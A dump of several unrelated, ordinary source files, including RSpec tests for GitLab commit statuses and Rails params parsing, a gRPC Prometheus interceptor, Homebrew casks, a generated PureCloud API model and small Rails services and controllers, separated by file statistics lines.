it { is_expected.to be_a(Float) }
it { is_expected.to be > 0.0 }
end
end
describe '.latest' do
subject { described_class.latest.order(:id) }
let(:statuses) do
[create_status(name: 'aa', ref: 'bb', status: 'running', retried: true),
create_status(name: 'cc', ref: 'cc', status: 'pending', retried: true),
create_status(name: 'aa', ref: 'cc', status: 'success', retried: true),
create_status(name: 'cc', ref: 'bb', status: 'success'),
create_status(name: 'aa', ref: 'bb', status: 'success')]
end
it 'returns unique statuses' do
is_expected.to eq(statuses.values_at(3, 4))
end
end
describe '.retried' do
subject { described_class.retried.order(:id) }
let(:statuses) do
[create_status(name: 'aa', ref: 'bb', status: 'running', retried: true),
create_status(name: 'cc', ref: 'cc', status: 'pending', retried: true),
create_status(name: 'aa', ref: 'cc', status: 'success', retried: true),
create_status(name: 'cc', ref: 'bb', status: 'success'),
create_status(name: 'aa', ref: 'bb', status: 'success')]
end
it 'returns unique statuses' do
is_expected.to contain_exactly(*statuses.values_at(0, 1, 2))
end
end
describe '.running_or_pending' do
subject { described_class.running_or_pending.order(:id) }
let(:statuses) do
[create_status(name: 'aa', ref: 'bb', status: 'running'),
create_status(name: 'cc', ref: 'cc', status: 'pending'),
create_status(name: 'aa', ref: nil, status: 'success'),
create_status(name: 'dd', ref: nil, status: 'failed'),
create_status(name: 'ee', ref: nil, status: 'canceled')]
end
it 'returns statuses that are running or pending' do
is_expected.to contain_exactly(*statuses.values_at(0, 1))
end
end
describe '.after_stage' do
subject { described_class.after_stage(0) }
let(:statuses) do
[create_status(name: 'aa', stage_idx: 0),
create_status(name: 'cc', stage_idx: 1),
create_status(name: 'aa', stage_idx: 2)]
end
it 'returns statuses from second and third stage' do
is_expected.to eq(statuses.values_at(1, 2))
end
end
describe '.exclude_ignored' do
subject { described_class.exclude_ignored.order(:id) }
let(:statuses) do
[create_status(when: 'manual', status: 'skipped'),
create_status(when: 'manual', status: 'success'),
create_status(when: 'manual', status: 'failed'),
create_status(when: 'on_failure', status: 'skipped'),
create_status(when: 'on_failure', status: 'success'),
create_status(when: 'on_failure', status: 'failed'),
create_status(allow_failure: true, status: 'success'),
create_status(allow_failure: true, status: 'failed'),
create_status(allow_failure: false, status: 'success'),
create_status(allow_failure: false, status: 'failed'),
create_status(allow_failure: true, status: 'manual'),
create_status(allow_failure: false, status: 'manual')]
end
it 'returns statuses without what we want to ignore' do
is_expected.to eq(statuses.values_at(0, 1, 2, 3, 4, 5, 6, 8, 9, 11))
end
end
describe '.failed_but_allowed' do
subject { described_class.failed_but_allowed.order(:id) }
let(:statuses) do
[create_status(allow_failure: true, status: 'success'),
create_status(allow_failure: true, status: 'failed'),
create_status(allow_failure: false, status: 'success'),
create_status(allow_failure: false, status: 'failed'),
create_status(allow_failure: true, status: 'canceled'),
create_status(allow_failure: false, status: 'canceled'),
create_status(allow_failure: true, status: 'manual'),
create_status(allow_failure: false, status: 'manual')]
end
it 'returns statuses without what we want to ignore' do
is_expected.to eq(statuses.values_at(1, 4))
end
end
describe '.status' do
context 'when there are multiple statuses present' do
before do
create_status(status: 'running')
create_status(status: 'success')
create_status(allow_failure: true, status: 'failed')
end
it 'returns a correct compound status' do
expect(described_class.all.status).to eq 'running'
end
end
context 'when there are only allowed to fail commit statuses present' do
before do
create_status(allow_failure: true, status: 'failed')
end
it 'returns status that indicates success' do
expect(described_class.all.status).to eq 'success'
end
end
context 'when using a scope to select latest statuses' do
before do
create_status(name: 'test', retried: true, status: 'failed')
create_status(allow_failure: true, name: 'test', status: 'failed')
end
it 'returns status according to the scope' do
expect(described_class.latest.status).to eq 'success'
end
end
end
describe '#before_sha' do
subject { commit_status.before_sha }
context 'when no before_sha is set for pipeline' do
before do
pipeline.before_sha = nil
end
it 'returns blank sha' do
is_expected.to eq(Gitlab::Git::BLANK_SHA)
end
end
context 'for before_sha set for pipeline' do
let(:value) { '1234' }
before do
pipeline.before_sha = value
end
it 'returns the set value' do
is_expected.to eq(value)
end
end
end
describe '#commit' do
it 'returns commit pipeline has been created for' do
expect(commit_status.commit).to eq project.commit
end
end
describe '#group_name' do
subject { commit_status.group_name }
tests = {
'rspec:windows' => 'rspec:windows',
'rspec:windows 0' => 'rspec:windows 0',
'rspec:windows 0 test' => 'rspec:windows 0 test',
'rspec:windows 0 1' => 'rspec:windows',
'rspec:windows 0 1 name' => 'rspec:windows name',
'rspec:windows 0/1' => 'rspec:windows',
'rspec:windows 0/1 name' => 'rspec:windows name',
'rspec:windows 0:1' => 'rspec:windows',
'rspec:windows 0:1 name' => 'rspec:windows name',
'rspec:windows 10000 20000' => 'rspec:windows',
'rspec:windows 0 : / 1' => 'rspec:windows',
'rspec:windows 0 : / 1 name' => 'rspec:windows name',
'0 1 name ruby' => 'name ruby',
'0 :/ 1 name ruby' => 'name ruby'
}
tests.each do |name, group_name|
it "'#{name}' puts in '#{group_name}'" do
commit_status.name = name
is_expected.to eq(group_name)
end
end
end
describe '#detailed_status' do
let(:user) { create(:user) }
it 'returns a detailed status' do
expect(commit_status.detailed_status(user))
.to be_a Gitlab::Ci::Status::Success
end
end
describe '#sortable_name' do
tests = {
'karma' => ['karma'],
'karma 0 20' => ['karma ', 0, ' ', 20],
'karma 10 20' => ['karma ', 10, ' ', 20],
'karma 50:100' => ['karma ', 50, ':', 100],
'karma 1.10' => ['karma ', 1, '.', 10],
'karma 1.5.1' => ['karma ', 1, '.', 5, '.', 1],
'karma 1 a' => ['karma ', 1, ' a']
}
tests.each do |name, sortable_name|
it "'#{name}' sorts as '#{sortable_name}'" do
commit_status.name = name
expect(commit_status.sortable_name).to eq(sortable_name)
end
end
end
describe '#locking_enabled?' do
before do
commit_status.lock_version = 100
end
subject { commit_status.locking_enabled? }
context "when changing status" do
before do
commit_status.status = "running"
end
it "lock" do
is_expected.to be true
end
it "raise exception when trying to update" do
expect { commit_status.save }.to raise_error(ActiveRecord::StaleObjectError)
end
end
context "when changing description" do
before do
commit_status.description = "test"
end
it "do not lock" do
is_expected.to be false
end
it "save correctly" do
expect(commit_status.save).to be true
end
end
end
describe 'set failure_reason when drop' do
let(:commit_status) { create(:commit_status, :created) }
subject do
commit_status.drop!(reason)
commit_status
end
context 'when failure_reason is nil' do
let(:reason) { }
it { is_expected.to be_unknown_failure }
end
context 'when failure_reason is script_failure' do
let(:reason) { :script_failure }
it { is_expected.to be_script_failure }
end
end
describe 'ensure stage assignment' do
context 'when commit status has a stage_id assigned' do
let!(:stage) do
create(:ci_stage_entity, project: project, pipeline: pipeline)
end
let(:commit_status) do
create(:commit_status, stage_id: stage.id, name: 'rspec', stage: 'test')
end
it 'does not create a new stage' do
expect { commit_status }.not_to change { Ci::Stage.count }
expect(commit_status.stage_id).to eq stage.id
end
end
context 'when commit status does not have a stage_id assigned' do
let(:commit_status) do
create(:commit_status, name: 'rspec', stage: 'test', status: :success)
end
let(:stage) { Ci::Stage.first }
it 'creates a new stage' do
expect { commit_status }.to change { Ci::Stage.count }.by(1)
expect(stage.name).to eq 'test'
expect(stage.project).to eq commit_status.project
expect(stage.pipeline).to eq commit_status.pipeline
expect(stage.status).to eq commit_status.status
expect(commit_status.stage_id).to eq stage.id
end
end
context 'when commit status does not have stage but it exists' do
let!(:stage) do
create(:ci_stage_entity, project: project,
pipeline: pipeline,
name: 'test')
end
let(:commit_status) do
create(:commit_status, project: project,
pipeline: pipeline,
name: 'rspec',
stage: 'test',
status: :success)
end
it 'uses existing stage' do
expect { commit_status }.not_to change { Ci::Stage.count }
expect(commit_status.stage_id).to eq stage.id
expect(stage.reload.status).to eq commit_status.status
end
end
context 'when commit status is being imported' do
let(:commit_status) do
create(:commit_status, name: 'rspec', stage: 'test', importing: true)
end
it 'does not create a new stage' do
expect { commit_status }.not_to change { Ci::Stage.count }
expect(commit_status.stage_id).not_to be_present
end
end
end
describe '#enqueue' do
let!(:current_time) { Time.new(2018, 4, 5, 14, 0, 0) }
before do
allow(Time).to receive(:now).and_return(current_time)
end
shared_examples 'commit status enqueued' do
it 'sets queued_at value when enqueued' do
expect { commit_status.enqueue }.to change { commit_status.reload.queued_at }.from(nil).to(current_time)
end
end
context 'when initial state is :created' do
let(:commit_status) { create(:commit_status, :created) }
it_behaves_like 'commit status enqueued'
end
context 'when initial state is :skipped' do
let(:commit_status) { create(:commit_status, :skipped) }
it_behaves_like 'commit status enqueued'
end
context 'when initial state is :manual' do
let(:commit_status) { create(:commit_status, :manual) }
it_behaves_like 'commit status enqueued'
end
context 'when initial state is :scheduled' do
let(:commit_status) { create(:commit_status, :scheduled) }
it_behaves_like 'commit status enqueued'
end
end
describe '#present' do
subject { commit_status.present }
it { is_expected.to be_a(CommitStatusPresenter) }
end
end
| 28.021849 | 112 | 0.626102 |
622dc67bbda561200cd3455522ea9c2c1f1baf74
| 2,723 |
module GRPCPrometheus
class ServerInterceptor < ::GRPC::ServerInterceptor
def initialize(server_metrics)
@server_metrics = server_metrics
end
def request_response(request: nil, call: nil, method: nil)
reporter = ServerReporter.new(
server_metrics: @server_metrics,
method: method,
grpc_type: GRPCType::UNARY,
)
grpc_err = nil
yield
rescue => err
grpc_err = to_grpc_err(err)
raise err
ensure
if grpc_err
reporter.handled(Util::ALL_CODES[grpc_err.code])
else
reporter.handled(Util::ALL_CODES[::GRPC::Core::StatusCodes::OK])
end
end
# These metrics for streaming messages can't be collected
# with the current gRPC implementation in Ruby
#
# - grpc_server_msg_received_total
# - grpc_server_msg_sent_total
#
# Need to wait for this Pull Request to be released:
#
# - https://github.com/grpc/grpc/pull/17651
def client_streamer(call: nil, method: nil)
reporter = ServerReporter.new(
server_metrics: @server_metrics,
method: method,
grpc_type: GRPCType::CLIENT_STREAM,
)
grpc_err = nil
yield
rescue => err
grpc_err = to_grpc_err(err)
raise err
ensure
if grpc_err
reporter.handled(Util::ALL_CODES[grpc_err.code])
else
reporter.handled(Util::ALL_CODES[::GRPC::Core::StatusCodes::OK])
end
end
def server_streamer(request: nil, call: nil, method: nil)
reporter = ServerReporter.new(
server_metrics: @server_metrics,
method: method,
grpc_type: GRPCType::SERVER_STREAM,
)
grpc_err = nil
yield
rescue => err
grpc_err = to_grpc_err(err)
raise err
ensure
if grpc_err
reporter.handled(Util::ALL_CODES[grpc_err.code])
else
reporter.handled(Util::ALL_CODES[::GRPC::Core::StatusCodes::OK])
end
end
def bidi_streamer(requests: nil, call: nil, method: nil)
reporter = ServerReporter.new(
server_metrics: @server_metrics,
method: method,
grpc_type: GRPCType::BIDI_STREAM,
)
grpc_err = nil
yield
rescue => err
grpc_err = to_grpc_err(err)
raise err
ensure
if grpc_err
reporter.handled(Util::ALL_CODES[grpc_err.code])
else
reporter.handled(Util::ALL_CODES[::GRPC::Core::StatusCodes::OK])
end
end
private
def to_grpc_err(err)
if err.is_a?(::GRPC::BadStatus)
err
else
::GRPC::BadStatus.new_status_exception(
::GRPC::Core::StatusCodes::UNKNOWN,
err.message
)
end
end
end
end
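# Illustrative wiring sketch (not part of the original file). Assuming
# `server_metrics` is the collector object expected by ServerReporter, the
# interceptor is handed to the gRPC server at construction time:
#
#   interceptor = GRPCPrometheus::ServerInterceptor.new(server_metrics)
#   server = GRPC::RpcServer.new(interceptors: [interceptor])
#   server.add_http2_port('0.0.0.0:50051', :this_port_is_insecure)
#   server.handle(MyServiceImpl.new)  # hypothetical service implementation
#   server.run_till_terminated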
| 25.448598 | 72 | 0.618068 |
ff51d555bc4f8f2b112d57d5656f2fb9f4699234
| 1,068 |
require 'rails_helper'
RSpec.describe ItemsService do
let(:user) { create :user }
let(:search) { create(:search, user: user) }
let(:old_item) { create(:item, search: search) }
let(:old_price) { create(:price, item: old_item) }
let(:items_data) { DataSupport.parsed_items }
context 'as usual' do
it 'create new items and prices' do
expect do
described_class.call(search_id: search.id, data: items_data)
end.to change { Item.count }.by(1)
.and change { Price.count }.by(1)
end
it 'update old items and create prices' do
items_data = DataSupport.parsed_items(init_id: old_item.product_id
.split('_')[1])
expect(old_price).to be_valid
expect(old_item.product_id).to eq(items_data.keys.first)
expect do
described_class.call(search_id: search.id,
data: items_data)
end.to change { Item.first.updated_at }
.and change { Price.count }.by(1)
end
end
end
| 34.451613 | 76 | 0.593633 |
212c671aa70c7290feeec50075ccdb57cfbedc3d
| 577 |
class Manager::DailyFinancials < ApplicationService
expects do
required(:manager).filled
end
delegate :manager, to: :context
before do
context.manager = Manager.ensure!(manager)
end
def call
manager.bands.each do |band|
result = Band::DailyUpdate.call(band: band)
if result.success?
Band::SpendMoney.(band: band, amount: result.daily_running_costs)
Band::EarnMoney.(band: band, amount: result.earnings )
else
# Probably should tell someone that the band couldn't update its data
end
end
end
end
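# Illustrative usage sketch (not part of the original file): the service is
# invoked like any other ApplicationService, typically from a daily job, e.g.
#
#   result = Manager::DailyFinancials.call(manager: manager)
#   result.success?  # => true once every band has been updated and settled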
| 24.041667 | 78 | 0.67591 |
8713041e5d83347024009745d5dde6ca9aadd5d5
| 394 |
cask 'kodelife' do
version '0.7.5.57'
sha256 '2cc81702d042ce83fa34d41812598356cff27fb1fc061d883cbd80827dbe1344'
url "https://hexler.net/pub/kodelife/kodelife-#{version}-macos.zip"
appcast 'https://hexler.net/pub/kodelife/appcast.hex'
name 'KodeLife'
homepage 'https://hexler.net/software/kodelife'
auto_updates true
depends_on macos: '>= :mavericks'
app 'KodeLife.app'
end
| 26.266667 | 75 | 0.751269 |
bf68e4aa49c6056556edd56ce7e4de0c624561ed
| 6,860 |
=begin
PureCloud Platform API
With the PureCloud Platform API, you can control all aspects of your PureCloud environment. With the APIs you can access the system configuration, manage conversations and more.
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
License: ININ
http://www.inin.com
Terms of Service: https://developer.mypurecloud.com/tos
=end
require 'date'
module PureCloud
class EdgeMetricsProcessor
# Percent time processor was active.
attr_accessor :active_time_pct
# Machine CPU identifier. 'total' will always be included in the array and is the total of all CPU resources.
attr_accessor :cpu_id
# Percent time processor was idle.
attr_accessor :idle_time_pct
# Percent time processor spent in privileged mode.
attr_accessor :privileged_time_pct
# Percent time processor spent in user mode.
attr_accessor :user_time_pct
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'active_time_pct' => :'activeTimePct',
:'cpu_id' => :'cpuId',
:'idle_time_pct' => :'idleTimePct',
:'privileged_time_pct' => :'privilegedTimePct',
:'user_time_pct' => :'userTimePct'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'active_time_pct' => :'Float',
:'cpu_id' => :'String',
:'idle_time_pct' => :'Float',
:'privileged_time_pct' => :'Float',
:'user_time_pct' => :'Float'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
if attributes.has_key?(:'activeTimePct')
self.active_time_pct = attributes[:'activeTimePct']
end
if attributes.has_key?(:'cpuId')
self.cpu_id = attributes[:'cpuId']
end
if attributes.has_key?(:'idleTimePct')
self.idle_time_pct = attributes[:'idleTimePct']
end
if attributes.has_key?(:'privilegedTimePct')
self.privileged_time_pct = attributes[:'privilegedTimePct']
end
if attributes.has_key?(:'userTimePct')
self.user_time_pct = attributes[:'userTimePct']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
return invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
  true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
active_time_pct == o.active_time_pct &&
cpu_id == o.cpu_id &&
idle_time_pct == o.idle_time_pct &&
privileged_time_pct == o.privileged_time_pct &&
user_time_pct == o.user_time_pct
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[active_time_pct, cpu_id, idle_time_pct, privileged_time_pct, user_time_pct].hash
end
# build the object from hash
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
else
#TODO show warning in debug mode
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
else
# data not found in attributes(hash), not an issue as the data can be optional
end
end
self
end
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /^(true|t|yes|y|1)$/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
_model = Object.const_get("PureCloud").const_get(type).new
_model.build_from_hash(value)
end
end
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
def to_body
to_hash
end
# return the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Method to output non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
def _to_hash(value)
if value.is_a?(Array)
value.compact.map{ |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 22.345277 | 177 | 0.567784 |
037425fe77208d88b56d8390b6b277341ea20173
| 766 |
cask 'joplin' do
version '1.0.227'
sha256 '01da5f312295bde810fe0165dc0b2c025197cb6092ab5673692bca8d238b9ca9'
# github.com/laurent22/joplin/ was verified as official when first introduced to the cask
url "https://github.com/laurent22/joplin/releases/download/v#{version}/Joplin-#{version}.dmg"
appcast 'https://github.com/laurent22/joplin/releases.atom'
name 'Joplin'
homepage 'https://joplin.cozic.net/'
app 'Joplin.app'
zap trash: [
'~/Library/Application Support/Joplin',
'~/Library/Preferences/net.cozic.joplin-desktop.helper.plist',
'~/Library/Preferences/net.cozic.joplin-desktop.plist',
'~/Library/Saved Application State/net.cozic.joplin-desktop.savedState',
]
end
| 38.3 | 95 | 0.693211 |
33451b210a68cdcd7e5128a10003a1467c01414e
| 1,331 |
#
class AssistsController < ProtectedController
before_action :set_assist, only: [:show, :update, :destroy]
before_action :authenticate, only: [:update, :create, :destroy]
# GET /assists
# GET /assists.json
def index
@assists = Assist.all
render json: @assists
end
# GET /assists/1
# GET /assists/1.json
def show
render json: @assist
end
# POST /assists
# POST /assists.json
def create
if current_user.admin == 'true'
@assist = Assist.new(assist_params)
if @assist.save
render json: @assist, status: :created, location: @assist
else
render json: @assist.errors, status: :unprocessable_entity
end
end
end
# PATCH/PUT /assists/1
# PATCH/PUT /assists/1.json
def update
if current_user.admin == 'true'
@assist = Assist.find(params[:id])
if @assist.update(assist_params)
head :no_content
else
render json: @assist.errors, status: :unprocessable_entity
end
end
end
# DELETE /assists/1
# DELETE /assists/1.json
def destroy
return unless current_user.admin == 'true'
@assist.destroy
head :no_content
end
private
def set_assist
@assist = Assist.find(params[:id])
end
def assist_params
params.require(:assist).permit(:player_id, :game_id)
end
end
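# Illustrative request sketch (not part of the original file), derived from
# assist_params above; only users with admin == 'true' reach the write paths:
#
#   POST /assists
#   { "assist": { "player_id": 1, "game_id": 2 } }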
| 19.865672 | 66 | 0.649136 |
1a56035796bb0fd5c8d78c8400ae204ebde1dd48
| 587 |
module VendorAPI
class RejectionReasonPresenter
attr_reader :application_choice
def initialize(application_choice)
@application_choice = application_choice
end
def present
if application_choice.structured_rejection_reasons.present?
rejection_reasons
else
application_choice.rejection_reason
end
end
private
def rejection_reasons
reasons = RejectedApplicationChoicePresenter.new(application_choice).rejection_reasons
reasons.map { |k, v| %(#{k}:\n#{Array(v).join("\n")}) }.join("\n\n")
end
end
end
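# Illustrative usage sketch (not part of the original file):
#
#   VendorAPI::RejectionReasonPresenter.new(application_choice).present
#   # => the structured reasons rendered as text, or the legacy free-text
#   #    rejection_reason when no structured reasons are present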
| 23.48 | 92 | 0.706985 |
f7f63503ae2d38fb9c5fc010133e887fbd23ad3e
| 1,202 |
module ConfigFindAllAsTree
def find_all_as_tree
returning(ActiveSupport::OrderedHash.new) do |result|
db_key = (ActiveRecord::Base.connection.adapter_name.downcase == 'mysql' ? '`key`' : 'key')
# For all settings
find(:all, :order => db_key).each do |setting|
# Split the setting path into an array
path = setting.key.split('.')
# Set the current level to the root of the hash
current_level = result
# iterate through all path levels
path.each do |path_element|
if path_element == path.last
# We are at the end of the path, so set the settting object as the value
current_level[path_element] = setting
else
# Not at the end yet, so first make sure that there is a hash for this key
current_level[path_element] ||= ActiveSupport::OrderedHash.new
# Reset the curent level to this hash object for this key
current_level = current_level[path_element]
end
end # if
end # each
end # returning
end # find_all_as_tree
end # ConfigFindAllAsTree
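# Illustrative usage sketch (an assumption, not part of the original file): the
# module is meant to be mixed into an ActiveRecord settings model whose `key`
# column holds dotted paths, e.g.
#
#   class Setting < ActiveRecord::Base
#     extend ConfigFindAllAsTree
#   end
#
#   # Given rows keyed "mail.smtp.host" and "mail.smtp.port",
#   # Setting.find_all_as_tree returns an OrderedHash shaped like:
#   #   { "mail" => { "smtp" => { "host" => <Setting>, "port" => <Setting> } } }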
| 34.342857 | 97 | 0.59817 |
bb185b888015bbea229513b7530d518ade3c7a53
| 1,506 |
# encoding: utf-8
#
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Selenium
module WebDriver
module PhantomJS
#
# @api private
#
class Service < WebDriver::Service
DEFAULT_PORT = 8910
@executable = 'phantomjs'.freeze
@missing_text = 'Unable to find phantomjs. Please download from http://phantomjs.org/download.html'.freeze
private
def start_process
@process = build_process(@executable_path, "--webdriver=#{@port}", *@extra_args)
@process.start
end
def cannot_connect_error_text
"unable to connect to phantomjs @ #{uri} after #{START_TIMEOUT} seconds"
end
end # Service
end # PhantomJS
end # WebDriver
end # Selenium
| 32.73913 | 114 | 0.700531 |
7a147abdc9b0381acaab2eafa7f4bd522a4c4d0a
| 141 |
require "ArduinoStringToNum/version"
require "ArduinoStringToNum/ArduinoBinTo"
class ArduinoStringToNum < String
include ArduinoBinTo
end
| 20.142857 | 41 | 0.851064 |
01686cab73c3b53b79b4e924cffa162c1a2b6bea
| 1,682 |
#
# Be sure to run `pod lib lint RichTextView.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'RichTextView'
s.version = '3.1.0'
s.summary = 'iOS Text View that Properly Displays LaTeX, HTML, Markdown, and YouTube/Vimeo Links.'
s.description = <<-DESC
This is an iOS UIView that Properly Displays LaTeX, HTML, Markdown, and YouTube/Vimeo Links. Simply feed in an input
string with the relevant rich text surrounded by the appropriate tags and it will render correctly. Specifically:
- Any math/LaTeX should be in between [math] and [/math] tags
- Any code should be in between [code] and [/code] tags
- Any YouTube videos should be represented as youtube[x], where x is the ID of the YouTube video
- Any Vimeo videos should be represented as vimeo[y], where y is the ID of the Vimeo video
DESC
s.homepage = 'https://github.com/tophat/RichTextView'
s.license = { :type => 'Apache-2', :file => 'LICENSE' }
s.author = { 'Top Hat' => 'tophat' }
s.source = { :git => 'https://github.com/tophat/RichTextView.git', :tag => s.version.to_s }
s.ios.deployment_target = '10.0'
s.source_files = 'Source/*.swift', 'Source/Text Parsing/*.swift', 'Source/Constants/*.swift', 'Source/Extensions/*.swift', 'Source/View Generators/*.swift', 'Source/Delegates/*.swift'
s.dependency 'Down'
s.dependency 'iosMath'
s.dependency 'SnapKit'
s.swift_version = '5.0'
end
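# Illustrative input sketch (not part of the original file): consumers feed the
# view a string that mixes the tags described above, e.g.
#
#   "Euler: [math]e^{i\\pi} + 1 = 0[/math], demo: youtube[VIDEO_ID]"
#
# where VIDEO_ID is a placeholder for a real YouTube video identifier.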
| 49.470588 | 185 | 0.671819 |
1169bf0cdbbb74287ee1f77d54587351fb5a0e2d
| 4,628 |
require "abstract_unit"
class UrlEncodedParamsParsingTest < ActionDispatch::IntegrationTest
class TestController < ActionController::Base
class << self
attr_accessor :last_request_parameters, :last_request_type
end
def parse
self.class.last_request_parameters = request.request_parameters
head :ok
end
end
def teardown
TestController.last_request_parameters = nil
end
test "parses unbalanced query string with array" do
query = "location[]=1&location[]=2&age_group[]=2"
expected = { "location" => ["1", "2"], "age_group" => ["2"] }
assert_parses expected, query
end
test "parses nested hash" do
query = [
"note[viewers][viewer][][type]=User",
"note[viewers][viewer][][id]=1",
"note[viewers][viewer][][type]=Group",
"note[viewers][viewer][][id]=2"
].join("&")
expected = {
"note" => {
"viewers" => {
"viewer" => [
{ "id" => "1", "type" => "User" },
{ "type" => "Group", "id" => "2" }
]
}
}
}
assert_parses expected, query
end
test "parses more complex nesting" do
query = [
"customers[boston][first][name]=David",
"customers[boston][first][url]=http://David",
"customers[boston][second][name]=Allan",
"customers[boston][second][url]=http://Allan",
"something_else=blah",
"something_nil=",
"something_empty=",
"products[first]=Apple Computer",
"products[second]=Pc",
"=Save"
].join("&")
expected = {
"customers" => {
"boston" => {
"first" => {
"name" => "David",
"url" => "http://David"
},
"second" => {
"name" => "Allan",
"url" => "http://Allan"
}
}
},
"something_else" => "blah",
"something_empty" => "",
"something_nil" => "",
"products" => {
"first" => "Apple Computer",
"second" => "Pc"
}
}
assert_parses expected, query
end
test "parses params with array" do
query = "selected[]=1&selected[]=2&selected[]=3"
expected = { "selected" => ["1", "2", "3"] }
assert_parses expected, query
end
test "parses params with nil key" do
query = "=&test2=value1"
expected = { "test2" => "value1" }
assert_parses expected, query
end
test "parses params with array prefix and hashes" do
query = "a[][b][c]=d"
expected = { "a" => [{ "b" => { "c" => "d" } }] }
assert_parses expected, query
end
test "parses params with complex nesting" do
query = "a[][b][c][][d][]=e"
expected = { "a" => [{ "b" => { "c" => [{ "d" => ["e"] }] } }] }
assert_parses expected, query
end
test "parses params with file path" do
query = [
"customers[boston][first][name]=David",
"something_else=blah",
"logo=#{File.expand_path(__FILE__)}"
].join("&")
expected = {
"customers" => {
"boston" => {
"first" => {
"name" => "David"
}
}
},
"something_else" => "blah",
"logo" => File.expand_path(__FILE__),
}
assert_parses expected, query
end
test "parses params with Safari 2 trailing null character" do
query = "selected[]=1&selected[]=2&selected[]=3\0"
expected = { "selected" => ["1", "2", "3"] }
assert_parses expected, query
end
test "ambiguous params returns a bad request" do
with_test_routing do
post "/parse", params: "foo[]=bar&foo[4]=bar"
assert_response :bad_request
end
end
private
def with_test_routing
with_routing do |set|
set.draw do
ActiveSupport::Deprecation.silence do
post ":action", to: ::UrlEncodedParamsParsingTest::TestController
end
end
yield
end
end
def assert_parses(expected, actual)
with_test_routing do
post "/parse", params: actual
assert_response :ok
assert_equal expected, TestController.last_request_parameters
assert_utf8 TestController.last_request_parameters
end
end
def assert_utf8(object)
correct_encoding = Encoding.default_internal
unless object.is_a?(Hash)
assert_equal correct_encoding, object.encoding, "#{object.inspect} should have been UTF-8"
return
end
object.each_value do |v|
case v
when Hash
assert_utf8 v
when Array
v.each { |el| assert_utf8 el }
else
assert_utf8 v
end
end
end
end
| 25.711111 | 98 | 0.55229 |
7aebb3ca0d03b3f8cd6b93e4bc3e44b8b17faf31
| 856 |
cask "canon-imageformula-driver" do
version "1.7.19.0917"
sha256 "9d02496b46d5e2d706734b892041a0d6f1bebc186d533cb00674767d727b3788"
# files.canon-europe.com/files/soft01-48579/Driver/ was verified as official when first introduced to the cask
url "https://files.canon-europe.com/files/soft01-48579/Driver/P215II_Installer.zip"
name "Canon ImageFormula Twain Driver"
homepage "https://www.canon.se/support/consumer_products/products/scanners/others/imageformula_p-215ii.html?type=drivers"
depends_on macos: ">= :sierra"
pkg "P215II_Installer.pkg"
uninstall quit: [
"com.canonElectronics.Installer.scanserver.pkg",
"com.canonElectronics.scanserver",
],
pkgutil: [
"com.canonElectronics.Installer.P215II Driver.pkg",
"com.canonElectronics.Installer.scanserver.pkg",
]
end
| 37.217391 | 123 | 0.732477 |
286742c345ff8c9f96960c54ff501ea2d6d359c8
| 2,526 |
class AiAmbulanceController < ApplicationController
def ai_direction
color = ["#6b6b6b","#e00b00","#62c100","#0e00f4","#9d6e8a","#988f66","#191919"]
result = []
setup_time = 10 # default minutes needed to pick up a patient and hand over at the hospital
speed = 50 # default ambulance speed in km/hr (converted to km/min where needed)
setup_time = params[:setup].to_i if params[:setup] # optional override from request params
speed = params[:speed].to_i if params[:speed] # optional override from request params
total_injure = 0
geo_hash = {}
geo_code = {}
color_json = {}
save_id = []
length = params[:length].to_i
1.upto(length) do |k|
next unless params["lat#{k}".intern]
this_injure = params["injure#{k}".intern].to_i
